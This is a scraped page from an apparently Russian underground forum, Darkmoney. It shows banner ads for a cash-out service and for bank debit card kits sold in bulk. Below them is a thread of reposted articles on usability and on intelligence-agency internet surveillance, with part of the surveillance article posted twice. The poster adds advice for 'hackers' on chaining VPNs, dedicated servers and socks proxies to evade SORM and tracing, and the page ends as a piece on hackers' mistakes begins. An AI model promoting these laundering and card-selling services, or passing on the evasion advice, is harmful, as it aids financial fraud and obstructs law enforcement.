TARANTINO OBNAL SERVICE №1 на рынке теневых услуг.
Депозит 1 млн.


✔️ Профессиональное сопровождение любых финансовых операций.

✔️ Россия, страны СНГ и Европы:

  • ➢ ФИЗ / ЮР лица
  • ➢ Мерчанты
  • ➢ ЭПС
  • ➢ Sim-карты
  • ➢ Работа с криптой по всему миру
  • ➢ Денежные переводы
ПЕРЕЙТИ К ТЕМЕ

ДЕБЕТОВЫЕ КАРТЫ СБЕРМАРКЕТ
  • ⭐️ Пожизненная гарантия от краж.
  • ⭐️ Все в наличии. Экспресс-доставка. Лучшие цены.
  • ⭐️ Ветка 2021 года. Сотни отзывов.
  • ⭐️ Статус Ветеран на ДаркМани.
  • ⭐️ Депозит миллион ₽.
КАРТЫ РФ 🇷🇺
КАРТЫ ГРУЗИИ 🇬🇪
ЛК КАЗАХСТАНА 🇰🇿


БОЛЕЕ 1000 КОМПЛЕКТОВ ДРУГИХ ТОПОВЫХ БАНКОВ ВСЕГДА В НАЛИЧИИ

>>> ПЕРЕЙТИ К ТЕМЕ <<<
Telegram: https://t.me/SberMarketTG

У форума есть зеркало в Тор http://darkmonn6oy55o7kgmwr4jny2gi2zj6hyalzcjgl444dvpalannl5jid.onion
Официальный канал Darkmoney в Телеграм https://t.me/+k1c69d6xQsswYzU0
NEW! 🔥 Чат Darkmoney в Телеграм https://t.me/+q40pcoHjSRVmNTE0

Разные статьи.

  • Автор темы Автор темы Rogge
  • Дата начала Дата начала
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Последнее редактирование:
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Мне запрещено продавать что либо на форуме.
Потому что я веду тему http://darkmoney.cc/prochie-temy-34/...-stat-i-12152/
Если я выложу что что то продаю или предлагаю купить то сообщите модератору


Чё за бред написал ,делаешь доброе дело да еще и оправдываешься..
пиши Рогги ,вперед малыш :)
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Мне запрещено продавать что либо на форуме.
Потому что я веду тему http://darkmoney.cc/prochie-temy-34/...-stat-i-12152/
Если я выложу что что то продаю или предлагаю купить то сообщите модератору


Чё за бред написал ,делаешь доброе дело да еще и оправдываешься..
пиши Рогги ,вперед малыш :)
Я это спецально написал чтоб не у кого не каких подозрений не было.

И так был уговор с АГ.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Лучше расскажи зачем ты фейки на пользователей делаешь ТС??
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
И чего ты материшься сразу? нервишки? надо сохранять спокойствие родной,в нашем деле это важно и также спокойно отвечать на прямо поставленные вопросы. А то что флудим в твоей теме то это разве флуд? мы можем отвечать в теме, что мы думаем о твоих "выставочных экспонатах" - а думаем мы что все это тень-хренотень, которую любой при желании может почитать на специально созданных форумах, а здесь все-таки площадка для так сказать "экономических партизанов" и инфу надо давать соответствующую. Но возможно админы думают иначе - насыщение форума так сказать))
Представляю сколько толпы сюда валит чтоб глянуть что тут делается)
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Юзабилити. Умное слово про обеспечение правильного взаимодействия системы с пользователем

Привет.
Сегодня я расскажу о самом тонком моменте во всей работе с компьютером, с программой, с сайтом – взаимодействии с пользователем.
Об этом, к сожалению, не пишут учебники(точнее пишут, но не учебники), и не существует какой-то выверенной схемы чтобы делать волшебство.
И заранее прошу прощения за то что в тексте так много воды. Во-первых я не могу серьезно рассказывать что-то умное, вечно тянет пошутить.

Менталитет

А во-вторых тема сама по себе довольно-таки странная, очень трудно выявить конкретные понятия при разговоре на общие темы.
Основная проблема в индивидуальности человека. Человеки – они такие, они разные. Что влияет на то, как именно человек будет взаимодействовать с программой, операционной системой или сайтом? Первое – это, конечно, то, откуда человек родом.

Русский менталитет – это в большинстве своем оставлять все на авось(кто может вспомнить хоть раз, когда читал инструкцию до включения свежекупленной какой-либо электроники? Поднимите лапку, я буду стрелять за гонево).

Американский – любовь к обнаженке, привычность к простоте.
Давайте взглянем на сайт правительства США.

sofficialwebportalmozil.png


Что мы видим?
made easy.
Америка - страна победившего капитализма. И люди в ней не хотят думать, люди хотят идти самым простым путем.
Среднестатистический американец – человек, который привык к достаточно размеренной жизни. Ему не нужно что-то переливающееся цветами и со множеством функций. Ему нужно то, что будет ему понятно с первого раза. Американцы идут по жизни экспансивным путем.

Если кто не в курсе. Экспансивный путь – расширение того, что имеется, и внедрение чего-то нового исключительно по крайней необходимости. Интенсивный – наоборот. Грубо говоря, экспансивность – это когда ты пашешь землю и каждый год отбираешь у индейцев по три акра земли. А интенсивность – это когда ты дружишь с индейцами, куришь с ними трубку мира и придумываешь способ как со своих двенадцати соток снимать столько же кукурузы, сколько этот наглое, неотесанное быдло по соседству, которое вечно притесняет индейцев и оккупирует их территории все больше и больше. Да, я заодно буду заниматься повышением общего уровня образования.

Так вот. Среднестатистическому американцу не нужно что-то переливающееся цветами и со множеством функций. Это нужно среднестатистическому японцу или китайцу. Кто не верит – зайдите на любой их сайт(хотя все мы там были, чего таить). Лично я, когда зашел в первый раз в китайнет, испугался и закрыл лицо руками.

Китайцы – неочевидные ребята. Они привыкли к сложностям. Точнее, они просто с ними готовы смирится, в отличии от остальных. Я однажды минут 15 пытался понять, как скачать с их файлообменника. Оказалось, необходимо сначала скачать флешгет. И только специальной ссылкой можно было скачать.(Так кстати и не скачалось. Зараза).

66662404.png


Тут даже иероглифы, кажется, кричат каждый о чем-то своем.

Не буду рассказывать про других, хотя в принципе был интересный опыт с немцами… На самом деле немцы действительно строгие ребята и придерживаются всего что им рекомендовано. Даже немецкие панки обычно соблюдают все что им говорят.

Для кого это все?

Так вот. Второй фактор – направленность человека. Клерк, сисадмин, (хорошо-хорошо!) специалист по информационной безопасности; школьник, студент, мать-одиночка. Все это – категории людей. И мы все прекрасно понимаем, что взаимодействовать они будут с системой по-разному. Абсолютно, целиком и полностью.

Это не только компьютерная грамотность, наличие опыта... Это еще и нежелание решать проблему самому, наличие какой-то глупой бравады, наивность, отношение к социуму. Кому-то интересны мировые проблемы, кому-то только порно и анекдоты. Кому-то важно знать все, что происходит, кому-то любопытно. У кого-то нет никакого желания.

Кто-то привык к большим кнопкам, кто-то к маленьким. Дизайнеры тыкают по кнопкам с планшета, а не мышкой, консольщики не тыкают кнопки – они набирают команду в шелле, умелые однорукие инвалиды допрыгивают до кнопки через табулятор.

Все это играет огромную роль. Почему? Потому что в первом случае необходимо сделать так, чтобы промахнуться мимо кнопки было сложно: например, сделать их больше. Ну или сделать какое-то улавливание нажатия в поле вокруг кнопки. Во втором – сделать понятным название атрибута и дополнить маны понятным комментарием. В третьем – сделать умный порядок пропрыгивания табуляции по кнопкам: по столбцам или строкам. В зависимости от того, как расположены группы кнопок.

И это одна кнопка.

Ну а вот еще пример. Загляните в книгу. Любую. Посмотрите, как расположены строки, абзацы, отступы. Все слитно, есть отступы. Может быть, разрывы между азбацами. Абзацы – любой длины. Оглавление, номера страниц. Это обычная верстка для текста. Специально для удобного, неторопливого чтения.

В газете все максимально ужато. Минимум места между абзацами, межстрочный интервал тоже нулевой. Все во имя места, чтобы влезло еще больше статей, еще больше рекламы.

А теперь пробегитесь глазами по этой статье. Самое главное в сетевой верстке текста – это видимые по отдельности абзацы и количество в них строк в среднем около двух-трех. Это служит для того, чтобы можно было нормально прочитать любой текст с большой скоростью, выхватывая самые важные фрагменты.

Еще есть выделение курсивом, жирным, подчеркиванием, но это отдельная тема про сетевую стилистику. Может, потом освещу почему НИКОГДА ни за что на свете нельзя выделять подчеркиванием обычный текст для привлечения внимания.

И где это все работает?

Так вот. И, наконец, третье – это условия использования.

Тетя из бухгалтерии порадуется розовому пони на заставке программы для знакомств в одноклассниках. Однако если такой розовый пони будет на какой-нибудь бухгалтерской программе, это ее напряжет.
Ну это я вкратце.

Что человек видит в мониторе?

Вообще говоря, можно выделить, пожалуй, пять пунктов, согласно которым любой веб-сайт, форма или программа оцениваются со стороны конечного пользователя. Это:

1)Соответствие ситуации – все то, что я описал выше. Насколько все происходящее подходит условиям использования – территориальность, таргетированность, социальная адекватность. Казалось бы, все довольно-таки логично и естественно, но об этом действительно очень часто забывают.

2)Пассивность. Чем меньше от человека требуется действий, чем больше делается для него и за него – тем меньше он думает. Каждый раз, когда человек должен делать выбор, он начинает, во-первых, задумываться о происходящем все больше и больше, ну и во-вторых ему лень тратить время и силы, чтобы вбить какую-то информацию, сделать выбор и решение. Ну и, конечно, нельзя забывать одну штуку. У нас в законодательстве везде «за действие или бездействие, приведшее к…». однако ж – обычно человеку изнутри кажется что если он ничего не сделал – его не за что винить.

3)Гармоничность. Дизайн – это важно. Он должен быть ненавязчивым. Он должен быть незаметным. Он должен быть удобным. Когда дизайн не мешает человеку взаимодействовать с сайтом, а, наоборот, помогает и при этом сам человек этого не замечает – это лучшее, что, пожалуй, мог бы сделать дизайнер. (Креативщики, извините. Хотя пофигу. Дизайн принимает заказчик, а не пользователи)

4)Понятность, очевидность. Самый яркий пример. Кнопка «вкл. звук». ЧТО ОНА ДЕЛАЕТ? Никто никогда не знает. Она может включить звук. А может показывать, что звук включен. Есть два решения. Но их никто никогда не использует. Это иконка звука кнопкой – кнопка нажата, значит звук включен. Никакой смены иконок. И это отдельно кнопка вкл/выкл звук и отдельно индикация включенности звука.

И последнее.

5)Отсутствие навязывания. Никогда еще человека не останавливала необходимость регистрации для скачивания. Но напрягала. Как ни странно – «наберите 5 сообщений чтобы скачать этот файл» никогда не делала хорошо. Кто захочет – скачает нафлудив. А если человек скачает один, два, три файла и форум или сайт станет знакомым – он мб и захочет остаться.

Итак:
Адекватность условиям.
Способ, который позволит достичь цели через минимальное количество затраченного времени и раздумий.
Нормальность для восприятия, отсутствие ощущения «чето тут не то»
Отсутствие необходимости задумываться о чем-то элементарном. Очевидность всего.
Ненавязчивость.
Нельзя заставлять делать что-то что человек может просто сделать. Хотите денег – просите. Хотите 250 сообщений – просите. Если человеку нужно - он все это даст. А заставлять его напрягаться – вы ни за что не заставите.

Если объяснять просто - человек любит, когда ему удобно. Человек любит, когда его не заставляют делать что-то и любит, когда ему что-то дают на блюдечке. Он не любит нести ответственность и напрягаться, волноваться. Вот, собственно, и все. Это логично. Но об этом забывают.
 
Последнее редактирование:
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
А вот и пример

Из последнего вспоминается модуль, над которым я сейчас работаю в одной команде. Говорю сразу, команда – не пяток школьников которые «че-то умеют», вполне серьезная небольшая коммерческая контора, правда главный программист(он же Самый Главный) пытается делать все вообще, начиная от дизайна и заканчивая поисковой оптимизацией сайта. Пока сдерживаем его.

Модуль был очень простой и очень умный. Задача модуля – обновлять программу и ее компоненты. Модуль может много, поддерживает сжатие, работу с патчами, тянет прокси, обновление отдельных частей, льет с фтп-шек, через хттп, поддерживает репозитории, хотели еще р2р добавить, пока что отговариваю, хотя можно и так сделать – для работы в локальных сетях.

Но речь не об этом. Речь об интерфейсе пользователя. Модуль – штука в себе. У него есть адрес, с которым он работает, но для конечного пользователя, не разработчика архитектуры, он неизвестен и неочевиден. После долгих раздумий и убеждений – модуль перестал поддерживать сотни настроек и тысячи возможностей, которыми никто не будет пользоваться. А программист - конечный пользователь - не оценит всех этих красивостей. Ему не нужно никаких свистелок и перделок. Ему нужно чтобы все работало быстро и надежно.

В нем в данный момент можно только запустить проверку обновлений, если обновления в наличии – он выдает информацию об этом по каждому из модулей или по программе в целом. Если обновления уже известно что есть – можно запустить обновление, он будет выдавать прогресс, на выходе – проверка целостности и информация о том, что все обновилось.

Если бы мы напихали в модуль тысячи функций, которые бы базировались на этих базовых – он бы стал тяжеловесным и довольно-таки неудобным в использовании. Не говоря уж о многомегобайтных инструкциях и манах. Все это можно было сделать в паре строчек кода, может чуть больше. На всякий случай – готовы примеры кода с выбором места для загрузки, с автоматизацией по времени, с выбором дополнительных модулей для загрузки.

На самом деле сам модуль уже доделан(хотя до идеала можно докручивать бесконечно), пока что пытаемся сообразить как сделать поддержку в багтрекерах. Основная причина – как отдельная программа данная софтинка не самое удобное решение. В качестве плагина к большой программе он смотрится лучше.

Это, кстати, один из показателей. Если в программе человек будет проводить время, работая –например, это браузер, офисная среда, среда разработки, в общем что-то, в чем идет постоянное наблюдение или взаимодействие с оболочкой – то эта программа становится для него рабочей средой, и человек начинает привыкать работать именно в ней. Если же идет какое-то единоразовое действие, особенно если это
действие использует результаты другой программы – то лучше реализовать все именно как плагин.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Анонимайзеры+Прокси=0

Эта статья о том, как компетентные органы выстраивают отношения с Интернетом. Служба людей, заботящихся о национальной безопасности своей страны в мирное время, как известно, на первый взгляд как будто не видна. Однако большинству людей известно, что служба эта идет, и порой события на так называемом невидимом фронте творятся не просто нешуточные, а почти на уровне вершения судеб мира, в то время как мирные граждане спят спокойным сном.

Наружное
Об опасной и трудной работе сотрудников мировых спецслужб написано много книг и снято много фильмов. Самый эпохальный из них - американский киносериал про агента британской внешней разведки MI6 Джеймса "Агента 007" Бонда, который за свою карьеру несколько раз спасал мир, и вообще известный красавец мужчина. Кстати, в эту пятницу продюсеры сериала огласили имя актера, который будет играть Бонда в следующем фильме - был выбран Дэниэл Крэйг.

А днем ранее работодатель мифологического агента - та самая MI6, она же SIS (Secret Intelligence Service - "секретная разведслужба") - вышла из цифрового подполья, открыв публичный официальный интернет-сайт по адресу www.mi6.gov.uk (он же www.sis.gov.uk). Известно, что это доменное имя существует довольно давно, но никакого сайта ранее там не было.

Существование MI6 вообще официально не признавалось британскими властями до 1994 года, хотя существует спецслужба с 1909-го. К 1995-му разведка переехала в пафосного вида новую штаб-квартиру на Воксхолл-кросc в Лондоне, которая была построена специально для MI6 с учетом всех необходимых технических особенностей и повышенных требований безопасности. Колоритное здание моментально стало "визитной карточкой" MI6 и в 1999 году "засветилось" в очередном фильме про Джеймса Бонда "И целого мира мало".
Кадр из фильма "И целого мира мало" (The World Is Not Enough, 1999, режиссер Майкл Эптед, в роли Бонда Пирс Броснан)

Вне всякого сомнения, Интернет как явление никогда не недооценивался сотрудниками британской внешней разведки, но существование публичного онлайнового представительства MI6 не признавалось разведчиками как насущная необходимость. И вот в 2005 году наконец в Сети появляется соответствующий сайт, главной "изюминкой" которого публика тут же признала раздел о приеме в SIS на работу. Также на сайте, разумеется, приведена довольно подробная информация об этой ранее строго засекреченной структуре, кроме того, есть разделы на разных языках, в том числе на русском.

В разделе "Карьера" рассказывается о некоторых традициях MI6, о тех, кто уже работает на внешнюю разведку, и дается информация о возможности трудоустройства (нанимают агентов, управленцев, ученых и технических специалистов). Кандидатам предлагаются "поездки за границу, жизнь, полная приключений" и возможность использовать последние технические новинки. Отмечается, что к услугам будущих разведчиков в штаб-квартире имеются спортзалы, тренажеры, ресторан, кафе и бар. Начальная зарплата обещана в размере 21 тысячи фунтов стерлингов в год. Кандидаты должны быть гражданами Великобритании старше 21 года и провести на родине по крайней мере 5 лет из последних 10.

Некоторые наблюдатели подозревают, что именно кадровые проблемы и подвигнули руководство MI6 к созданию своего красочного интернет-ресурса (сайт, конечно же, сделан качественно и профессионально). Возможно, в свете разгула терроризма последних лет британская молодежь теряет интерес к шпионской карьере, хотя может быть, что ведомство как раз расширяется - точно здесь сказать трудно, на сайте постоянно подчеркивается, что MI6 сплошь окружена секретами. Впрочем, больной вопрос о том, в каую сумму она обходится налогоплательщикам, на сайте затронут - сообщается, что содержание корпуса шпионов сейчас стоит британской короне примерно 1,3 миллиарда фунтов, а к 2008 году эта цифра должна увеличиться до 1,5 миллиардов фунтов (что подтверждает гипотезу о расширении).

В целом, спецслужбы разных стран мира в последние годы вынуждены мириться с частичным снятием ореола секретности, потому что демократические устои наиболее развитых стран диктуют соблюдение госведомствами принципов информационной открытости. После терактов 11 сентября 2001 года в США британцы и вовсе начали обвинять свои спецслужбы в чрезмерной пассивности, в результате чего правительство провело в спецслужбах реформу. Ведомства специального назначения, в том числе и MI6, стали работать по-новому, однако избежать лондонских взрывов этого лета англичанам не удалось.

MI6 также не так давно выслушала изрядное количество ругательных слов от общественности и правительства за работу, связанную с войной в Ираке (в частности, за скандал вокруг так называемого "иракского досье", чуть не стоивший кресла Тони Блэру). Весьма вероятно, что открытие нового сайта связано также и с этим - спецслужба хочет показать народу, что она активно работает.

Внутреннее
Несколькими месяцами ранее Интернет увидел обновленный сайт внутренней британской разведки MI5 по также давно существующему адресу www.mi5.gov.uk. Разной степени информативности страницы появлялись в этом домене примерно с 1998 года - на них всегда размещалась некоторая общая информация о спецслужбе, но с апреля этого года было заявлено о доселе не виданном уровне публичности организации, а сайт превращен в информационный портал.

Руководство спецслужбы пояснило, что новая политика этой организации предусматривает доведение до широких масс информации о мерах безопасности и противодействия терроризму в связи с текущей ситуацией в мире. В рамках портала появился и рекрутинговый раздел - внутренней разведке тоже оказалась нужна "свежая кровь" из числа сообразительной молодежи.

Конечно же, на сайте содержатся и призывы к тем, кому есть что сказать внутренним разведчикам, делать это. Приветствуется информация о возможных террористах, об иностранных шпионах и вообще о любых угрозах родине. Кроме того, сайт MI5 стал обращаться к своим посетителям на языках крупных британских этнических диаспор - на арабском и на языке урду, на котором говорят переселенцы из Пакистана. Представителей этих социальных групп внутренняя разведка на их языке также призвала оказывать посильную помощь в деле охраны государственной безопасности и сообщать о любых подозрительных проявлениях.

Лондонские теракты в июле, тем не менее, все равно произошли. Сейчас Евросоюз обсуждает планы по архивированию всех разговоров и писем европейцев и хранению этих данных в течение года для облегчения оперативно-розыскной деятельности полиции.

Общее
Как уже было отмечено, нельзя сказать, что интерес к Интернету у британских спецслужб появился лишь в связи с необходимостью набора новых кадров, желанием поправить имидж и поисками путей "конструктивного диалога" с интернет-пользователями. На самых ранних этапах развития Интернета спецслужбы США, Великобритании и других стран осознавали информационный потенциал глобальной Сети и думали, каким образом можно его можно использовать в своих интересах.

В 1999 году на весь мир гремело слово "Эшелон" (Echelon) - под этим понятием подразумевалась используемая спецслужбами США, Великобритании и Австралии, Канады и Новой Зеландии (не без помощи правительств ряда других стран) суперсекретная система глобальной интернет-слежки за любой интернет-активностью любых интернет-пользователей. С помощью компьютеров невиданной мощности она, как выяснилось, может анализировать произвольно взятый интернет-трафик на предмет содержания в нем заданных ключевых слов, которые потенциально могут использовать в своей переписке террористы.

Американо-британская база радиоперехвата Menwith Hill в графстве Северный Йоркшир (Великобритания), крупнейшая в мире. Считают, что это один из главных компонентов "Эшелона" (по данным FAS, станция способна совершать 2 миллиона радиоперехватов в час).

Рассекретившие (не без помощи хакеров) систему правозащитники требовали от разведчиков прекратить подслушивать весь мир - по некоторым данным, "Эшелон" начинался аж после Второй мировой войны для слежения за системами телекоммуникаций Советского Союза. Его ресурсы, контролируемые, согласно обнародованным данным, Агентством национальной безопасности США (АНБ, NSA), построены на сетях секретных спутников, антенн и вычислительных центров, которые могут перехватывать и обрабатывать различные радиосигналы, а также телефонные звонки и факсы; с распространением по миру Интернета система была сориентирована и на него. Среди прочего, спецслужбы обвинялись в том, что после устранения советской угрозы "Эшелон" был переориентирован на промышленный шпионаж.

Разведчики долго отнекивались, но в итоге некоторые из них признались, что "Эшелон" действительно существует. Информация на эту тему, как всегда, противоречивая, и что происходит с "Эшелоном" в наше время, точно сказать сложно - скорее всего, она успешно продолжает функционировать. В 2000 году дело "Эшелона" слушалось в Европарламенте - депутаты потребовали разъяснений от АНБ и ЦРУ, но те от разговора уклонились. В 2001 году Германия выставила агентов АНБ с радиолокационной станции Bad Aibling в Баварии, инкриминировав им использование "Эшелона" в корыстных целях. Тогда же прозвучали аналогичные обвинения со стороны японцев.

Впрочем, примерно в то же время выяснилось, что ФБР США начало внедрение на мощностях некоторых интернет-провайдеров новой, более продвинутой системы слежки - Carnivore ("плотоядное"), которая тоже умеет искать нужные слова в проходящем мимо трафике и даже, возможно, вычислять одинаковый трафик на разных каналах для определения источника его происхождения (таким образом, например, теоретически можно найти хакера, прячущегося за анонимными прокси-серверами). Проект по созданию ее аналога обнаружился и у британцев (как раз по линии MI5).

В начале же нынешнего года спецслужба ФБР в открытую заявила, что Carnivore устарела, с "вооружения" снимается, а на смену ей приходит новая система (созданная, кстати, коммерческим производителем), о которой ФБР ничего никому рассказывать не будет.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Частное
Таким образом, можно сделать вывод о том, что MI5, MI6 и их коллеги с других континентов действительно хорошо себя чувствуют в Сети. В нынешнем августе, по некоторой информации, британцы ответили на лондонские теракты таинственным "принудительным закрытием" некоторых наиболее радикальных исламистских интернет-ресурсов (а сейчас, по отдельным сведениям, идет активная борьба с распространением недавно начатого интернет-вещания "Аль-Каеды").

Как именно британцам удалось этого добиться, точно, конечно же, неизвестно, но британская газета The Sunday Times, обнародовавшая эту информацию, ссылается на... спецслужбы Израиля. Израильские разведчики, одни из лучших в мире, вообще много чего знают и умеют.

...И тоже сталкиваются с вопросами необходимости освещения своей деятельности в Интернете, сбора через него сведений от информаторов и, конечно, рекрутинговой работы. Еще в марте этого года внутренняя израильская разведслужба ШАБАК ("Служба общей безопасности"), ранее также в цифровом пространстве себе не проявлявшая, запустила онлайновое представительство по легко угадываемому адресу שירות הביטחון הכללי. Пока на нем размещена информация только на иврите и основная ее часть касается именно кадровой политики.

Внешняя израильская разведка "Моссад", в свою очередь, примерно с начала 2004 года в сдержанной форме оповещает мир о своих достижениях по адресу www.mossad.gov.il. В принципе, существование этого сайта можно обосновать нормами "хорошего сетевого поведения", заданными главными спецслужбами США - ЦРУ, ФБР и другими, которые поддерживают свои подробные и хорошо проработанные интернет-ресурсы с "начала времен". Надо ли говорить, что любые сайты любых спецслужб являются излюбленными объектами регулярных хакерских шалостей.

Близкое
И здесь необходимо отметить, что нормы сетевого поведения разведслужб адекватно воспринимаются и российской Федеральной службой безопасности, которая открыла свой сайт еще в конце 1999 года (без всяких предписаний относительно информационной открытости госорганов) по адресу www.fsb.ru. Среди информационных разделов, рассказывающих о деятельности ведомства, некоторые посетители тогда сразу отметили для себя раздел "Телефон доверия", где, в частности, говорится: "Российские граждане, сотрудничающие с иностранными разведками, могут связаться с ФСБ России по телефону доверия с тем, чтобы стать агентами-двойниками. В этом случае денежное вознаграждение, получаемое такими агентами от иностранных спецслужб, будет полностью сохранено, и с ними будут работать сотрудники ФСБ РФ высочайшего класса. При этом будет гарантирована анонимность и конфиденциальность". Далее следует выдержка из примечания к статье 275 УК РФ ("государственная измена"), где говорится, что добровольное и своевременное оповещение о собственной шпионской деятельности может быть основанием для освобождения от уголовной ответственности.

Еще раньше ФСБ, наследница одной из наиболее могущественных спецслужб мира - КГБ СССР, - начала работу над собственным локальным аналогом Carnivore - системой СОРМ-2 ("система оперативно-розыскных мероприятий"), которая, по некоторым данным, была в последующие месяцы успешно внедрена на мощностях российских интернет-провайдеров. Кстати, с 1 января 2006 года вступает в силу утвержденная недавно правительством РФ новая недакция правил взаимодействия операторов связи с уполномоченными государственными органами, осуществляющими оперативно-розыскную деятельность.

Примерно с 2001 года существует сайт Службы внешней разведки России (СВР) ?????? ??????? ???????? ?????????? ?????????, который также довольно обстоятельно рассказывает о деятельности этого ведомства в области охраны государственной безопасности.

Как известно, Интернет как таковой вырос из американского военного проекта, и довольно легко можно себе представить, что информационный потенциал глобальной сети был вовремя оценен и Пентагоном, и американскими спецслужбами, следствием чего могли стать механизмы "контроля" за Интернетом, заложенные в самую его первооснову. Недаром США сейчас наотрез отказываются отдавать контроль над базовыми структурами Сети (корневыми DNS-серверами) Организации объединенных наций, которая подняла этот вопрос в преддверии Всемирного саммита по информационному сообществу (WSIS), который будет проходить в ноябре в Тунисе.

Сергей Рублёв

ВЫВОДЫ:


Так что уважаемые господа хацкеры все соксы и прокси очень легко отследить коннекты даже если логов не ведется.
Отсюда делаем выводы:
1) Всегда используем VPN для обхода СОРМ в Ru.
2) Берем Socks 5 нейтральных стран,таких как Турция,Испания и т.д.
3) Не забываем что протокол VoIP не поддерживает соксы(стало быть впн юзаем)
4) Идеальная цепочка VPN - Win Dedic - VPN(or socks) - Socks с поддержкой DES криптовки.
При таком раскладке вычеслить будет невозможно с вероятностью 99,9%
Но не стоит делать завышеную самооценку себе т.к пробивать могут и не по этим признакам(допустим по нику если сделан дефейс) и т.д.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Частное
Таким образом, можно сделать вывод о том, что MI5, MI6 и их коллеги с других континентов действительно хорошо себя чувствуют в Сети. В нынешнем августе, по некоторой информации, британцы ответили на лондонские теракты таинственным "принудительным закрытием" некоторых наиболее радикальных исламистских интернет-ресурсов (а сейчас, по отдельным сведениям, идет активная борьба с распространением недавно начатого интернет-вещания "Аль-Каеды").

Как именно британцам удалось этого добиться, точно, конечно же, неизвестно, но британская газета The Sunday Times, обнародовавшая эту информацию, ссылается на... спецслужбы Израиля. Израильские разведчики, одни из лучших в мире, вообще много чего знают и умеют.

...И тоже сталкиваются с вопросами необходимости освещения своей деятельности в Интернете, сбора через него сведений от информаторов и, конечно, рекрутинговой работы. Еще в марте этого года внутренняя израильская разведслужба ШАБАК ("Служба общей безопасности"), ранее также в цифровом пространстве себе не проявлявшая, запустила онлайновое представительство по легко угадываемому адресу שירות הביטחון הכללי. Пока на нем размещена информация только на иврите и основная ее часть касается именно кадровой политики.

Внешняя израильская разведка "Моссад", в свою очередь, примерно с начала 2004 года в сдержанной форме оповещает мир о своих достижениях по адресу www.mossad.gov.il. В принципе, существование этого сайта можно обосновать нормами "хорошего сетевого поведения", заданными главными спецслужбами США - ЦРУ, ФБР и другими, которые поддерживают свои подробные и хорошо проработанные интернет-ресурсы с "начала времен". Надо ли говорить, что любые сайты любых спецслужб являются излюбленными объектами регулярных хакерских шалостей.

Близкое
И здесь необходимо отметить, что нормы сетевого поведения разведслужб адекватно воспринимаются и российской Федеральной службой безопасности, которая открыла свой сайт еще в конце 1999 года (без всяких предписаний относительно информационной открытости госорганов) по адресу Информация ФСБ России :: Федеральная Служба Безопасности. Среди информационных разделов, рассказывающих о деятельности ведомства, некоторые посетители тогда сразу отметили для себя раздел "Телефон доверия", где, в частности, говорится: "Российские граждане, сотрудничающие с иностранными разведками, могут связаться с ФСБ России по телефону доверия с тем, чтобы стать агентами-двойниками. В этом случае денежное вознаграждение, получаемое такими агентами от иностранных спецслужб, будет полностью сохранено, и с ними будут работать сотрудники ФСБ РФ высочайшего класса. При этом будет гарантирована анонимность и конфиденциальность". Далее следует выдержка из примечания к статье 275 УК РФ ("государственная измена"), где говорится, что добровольное и своевременное оповещение о собственной шпионской деятельности может быть основанием для освобождения от уголовной ответственности.

Еще раньше ФСБ, наследница одной из наиболее могущественных спецслужб мира - КГБ СССР, - начала работу над собственным локальным аналогом Carnivore - системой СОРМ-2 ("система оперативно-розыскных мероприятий"), которая, по некоторым данным, была в последующие месяцы успешно внедрена на мощностях российских интернет-провайдеров. Кстати, с 1 января 2006 года вступает в силу утвержденная недавно правительством РФ новая недакция правил взаимодействия операторов связи с уполномоченными государственными органами, осуществляющими оперативно-розыскную деятельность.

Примерно с 2001 года существует сайт Службы внешней разведки России (СВР) ������ ������� �������� ���������� ���������, который также довольно обстоятельно рассказывает о деятельности этого ведомства в области охраны государственной безопасности.

Как известно, Интернет как таковой вырос из американского военного проекта, и довольно легко можно себе представить, что информационный потенциал глобальной сети был вовремя оценен и Пентагоном, и американскими спецслужбами, следствием чего могли стать механизмы "контроля" за Интернетом, заложенные в самую его первооснову. Недаром США сейчас наотрез отказываются отдавать контроль над базовыми структурами Сети (корневыми DNS-серверами) Организации объединенных наций, которая подняла этот вопрос в преддверии Всемирного саммита по информационному сообществу (WSIS), который будет проходить в ноябре в Тунисе.

Сергей Рублёв

ВЫВОДЫ:


Так что уважаемые господа хацкеры все соксы и прокси очень легко отследить коннекты даже если логов не ведется.
Отсюда делаем выводы:
1) Всегда используем VPN для обхода СОРМ в Ru.
2) Берем Socks 5 нейтральных стран,таких как Турция,Испания и т.д.
3) Не забываем что протокол VoIP не поддерживает соксы(стало быть впн юзаем)
4) Идеальная цепочка VPN - Win Dedic - VPN(or socks) - Socks с поддержкой DES криптовки.
При таком раскладке вычеслить будет невозможно с вероятностью 99,9%
Но не стоит делать завышеную самооценку себе т.к пробивать могут и не по этим признакам(допустим по нику если сделан дефейс) и т.д.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Десять роковых ошибок хакера

Молодой хакер, на счету которого было огромное количество взломанных машин, безуспешно пытался зайти на сервер международного банка. Эту систему он наконец-то взломал, потратив на нее несколько бессонных ночей. "Неужели засекли? Я же чистил логи и был предельно осторожен", - вертелось у него в голове. Внезапно его раздумья прервал тонкий писк UPS, что означало отключение электропитания. Затем раздался громкий стук в дверь, за которой стояли вооруженные работники федеральной службы. Эта история закончилась бы печально, если бы горе-хакер не... проснулся от писка своего будильника.

На самом деле, мало кто из хакеров станет взламывать банковские системы, не зная азов собственной безопасности. Админы на стратегически важных системах - люди неглупые и получают за свою работу хорошие деньги, поэтому соревноваться с ними в знаниях компьютерных технологий очень опасно.

